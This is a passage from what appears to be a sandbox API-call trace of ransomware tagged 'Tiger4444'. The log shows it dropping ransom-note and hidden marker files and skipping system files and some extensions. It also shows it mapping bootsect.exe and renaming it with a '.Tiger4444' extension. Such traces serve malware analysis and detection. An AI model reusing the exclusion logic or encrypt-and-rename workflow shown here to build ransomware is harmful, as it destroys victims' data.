lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2="Tiger4444.exe") returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0038.156] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0038.156] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="Tiger4444.exe") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2=".") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="..") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="windows") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="bootmgr") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="pagefile.sys") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="boot") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="ids.txt") returned 1 [0038.156] lstrcmpiW (lpString1="Windows10Upgrade", lpString2="NTUSER.DAT") returned 1 [0038.156] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Windows10Upgrade" | out: lpString1="Windows10Upgrade") returned="Windows10Upgrade" [0038.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0038.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x28) returned 0xc7c148 [0038.156] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc66528 [0038.156] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0038.156] FindClose (in: hFindFile=0xc72dc8 | out: hFindFile=0xc72dc8) returned 1 [0038.156] lstrcpyW (in: lpString1=0x30aeaae, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0038.156] CreateFileW (lpFileName="C:\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0038.157] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x290 [0038.157] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0038.158] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0038.158] CloseHandle (hObject=0x290) returned 1 [0038.158] CloseHandle (hObject=0x280) returned 1 [0038.159] GetCurrentThreadId () returned 0xfa8 [0038.159] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0038.159] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0038.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7c148 | out: hHeap=0xc50000) returned 1 [0038.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0038.159] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade" | out: lpString1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0038.159] lstrcatW (in: lpString1="C:\\Windows10Upgrade", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\") returned="C:\\Windows10Upgrade\\" [0038.159] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3" [0038.159] CreateFileW (lpFileName="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0038.287] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0038.290] FlushFileBuffers (hFile=0x2ac) returned 1 [0038.291] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0038.291] CloseHandle (hObject=0x2ac) returned 1 [0038.294] lstrlenW (lpString="C:\\Windows10Upgrade") returned 19 [0038.294] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0038.294] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d08 [0038.294] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.294] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.294] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0038.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0038.294] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.294] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.294] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.294] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0038.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0038.294] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0038.294] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7bd7c39a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7bd7c39a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0038.294] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.294] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0038.294] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea355be9, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="Tiger4444.exe") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2=".") returned 1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="..") returned 1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="windows") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="bootmgr") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="pagefile.sys") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="boot") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="ids.txt") returned -1 [0038.295] lstrcmpiW (lpString1="2052", lpString2="NTUSER.DAT") returned -1 [0038.295] lstrcpyW (in: lpString1=0x30aead0, lpString2="2052" | out: lpString1="2052") returned="2052" [0038.295] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\2052" | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0038.295] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\2052\\") returned="C:\\Windows10Upgrade\\2052\\" [0038.295] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" [0038.295] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\2052\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b0 [0038.296] WriteFile (in: hFile=0x2b0, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0038.298] FlushFileBuffers (hFile=0x2b0) returned 1 [0038.299] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0038.299] CloseHandle (hObject=0x2b0) returned 1 [0038.321] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0038.321] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72f88 [0038.321] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc666c8 | out: ListHead=0xc66808, ListEntry=0xc666c8) returned 0x0 [0038.321] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3659ec, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3659ec, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x704c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appraiserxp.dll", cAlternateFileName="APPRAI~1.DLL")) returned 1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="Tiger4444.exe") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2=".") returned 1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="..") returned 1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="windows") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="bootmgr") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="pagefile.sys") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="boot") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="ids.txt") returned -1 [0038.321] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="NTUSER.DAT") returned -1 [0038.321] lstrcpyW (in: lpString1=0x30aead0, lpString2="appraiserxp.dll" | out: lpString1="appraiserxp.dll") returned="appraiserxp.dll" [0038.321] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\appraiserxp.dll", dwFileAttributes=0x0) returned 1 [0038.336] lstrlenW (lpString="appraiserxp.dll") returned 15 [0038.336] lstrlenW (lpString="Tiger4444") returned 9 [0038.336] lstrcmpiW (lpString1="serxp.dll", lpString2="Tiger4444") returned -1 [0038.336] lstrlenW (lpString=".dll") returned 4 [0038.336] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0038.336] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea36cf08, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea36cf08, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootsect.exe", cAlternateFileName="")) returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="Tiger4444.exe") returned -1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2=".") returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="..") returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="windows") returned -1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="bootmgr") returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="pagefile.sys") returned -1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="boot") returned 1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="ids.txt") returned -1 [0038.336] lstrcmpiW (lpString1="bootsect.exe", lpString2="NTUSER.DAT") returned -1 [0038.336] lstrcpyW (in: lpString1=0x30aead0, lpString2="bootsect.exe" | out: lpString1="bootsect.exe") returned="bootsect.exe" [0038.336] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\bootsect.exe", dwFileAttributes=0x0) returned 1 [0038.337] lstrlenW (lpString="bootsect.exe") returned 12 [0038.337] lstrlenW (lpString="Tiger4444") returned 9 [0038.337] lstrcmpiW (lpString1="tsect.exe", lpString2="Tiger4444") returned 1 [0038.337] lstrlenW (lpString=".dll") returned 4 [0038.337] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0038.337] lstrlenW (lpString=".lnk") returned 4 [0038.337] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0038.337] lstrlenW (lpString=".ini") returned 4 [0038.337] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0038.337] lstrlenW (lpString=".sys") returned 4 [0038.337] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0038.337] CreateFileW (lpFileName="C:\\Windows10Upgrade\\bootsect.exe" (normalized: "c:\\windows10upgrade\\bootsect.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b0 [0038.337] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0038.337] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=12979030751) returned 1 [0038.337] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=118472) returned 1 [0038.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc60fe8 [0038.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0038.337] CreateFileMappingW (hFile=0x2b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d1d0, lpName=0x0) returned 0x2b4 [0038.339] MapViewOfFile (hFileMappingObject=0x2b4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d1d0) returned 0xc20000 [0038.566] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d140 [0038.566] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0038.566] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0038.566] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0038.566] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0038.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0038.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0038.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0038.567] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13001995680) returned 1 [0038.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0038.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0038.567] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0038.568] CloseHandle (hObject=0x2b4) returned 1 [0038.568] CloseHandle (hObject=0x2b0) returned 1 [0038.571] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\bootsect.exe.Tiger4444") returned 42 [0038.571] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\bootsect.exe" (normalized: "c:\\windows10upgrade\\bootsect.exe"), lpNewFileName="C:\\Windows10Upgrade\\bootsect.exe.Tiger4444" (normalized: "c:\\windows10upgrade\\bootsect.exe.tiger4444"), dwFlags=0x1) returned 1 [0038.572] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=118480 | out: Addend=0xc6f980) returned 16 [0038.572] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=229 | out: Addend=0xc6f98c) returned 9 [0038.572] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea350dad, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea350dad, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xb08c3ee, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Configuration.ini", cAlternateFileName="CONFIG~1.INI")) returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="Tiger4444.exe") returned -1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2=".") returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="..") returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="windows") returned -1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="bootmgr") returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="pagefile.sys") returned -1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="boot") returned 1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="ids.txt") returned -1 [0038.572] lstrcmpiW (lpString1="Configuration.ini", lpString2="NTUSER.DAT") returned -1 [0038.572] lstrcpyW (in: lpString1=0x30aead0, lpString2="Configuration.ini" | out: lpString1="Configuration.ini") returned="Configuration.ini" [0038.572] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\Configuration.ini", dwFileAttributes=0x0) returned 1 [0038.573] lstrlenW (lpString="Configuration.ini") returned 17 [0038.573] lstrlenW (lpString="Tiger4444") returned 9 [0038.573] lstrcmpiW (lpString1="ation.ini", lpString2="Tiger4444") returned -1 [0038.573] lstrlenW (lpString=".dll") returned 4 [0038.573] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0038.573] lstrlenW (lpString=".lnk") returned 4 [0038.573] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0038.573] lstrlenW (lpString=".ini") returned 4 [0038.573] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0038.573] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea36e29e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea36e29e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cosquery.dll", cAlternateFileName="")) returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="Tiger4444.exe") returned -1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2=".") returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="..") returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="windows") returned -1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="bootmgr") returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="pagefile.sys") returned -1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="boot") returned 1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="ids.txt") returned -1 [0038.573] lstrcmpiW (lpString1="cosquery.dll", lpString2="NTUSER.DAT") returned -1 [0038.573] lstrcpyW (in: lpString1=0x30aead0, lpString2="cosquery.dll" | out: lpString1="cosquery.dll") returned="cosquery.dll" [0038.573] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\cosquery.dll", dwFileAttributes=0x0) returned 1 [0038.573] lstrlenW (lpString="cosquery.dll") returned 12 [0038.573] lstrlenW (lpString="Tiger4444") returned 9 [0038.573] lstrcmpiW (lpString1="query.dll", lpString2="Tiger4444") returned -1 [0038.573] lstrlenW (lpString=".dll") returned 4 [0038.573] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0038.573] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea370998, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea370998, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x508c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DevInv.dll", cAlternateFileName="")) returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="Tiger4444.exe") returned -1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2=".") returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="..") returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="windows") returned -1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="bootmgr") returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="pagefile.sys") returned -1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="boot") returned 1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="ids.txt") returned -1 [0038.574] lstrcmpiW (lpString1="DevInv.dll", lpString2="NTUSER.DAT") returned -1 [0038.574] lstrcpyW (in: lpString1=0x30aead0, lpString2="DevInv.dll" | out: lpString1="DevInv.dll") returned="DevInv.dll" [0038.574] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DevInv.dll", dwFileAttributes=0x0) returned 1 [0038.574] lstrlenW (lpString="DevInv.dll") returned 10 [0038.574] lstrlenW (lpString="Tiger4444") returned 9 [0038.574] lstrcmpiW (lpString1="evInv.dll", lpString2="Tiger4444") returned -1 [0038.574] lstrlenW (lpString=".dll") returned 4 [0038.574] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0038.574] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, 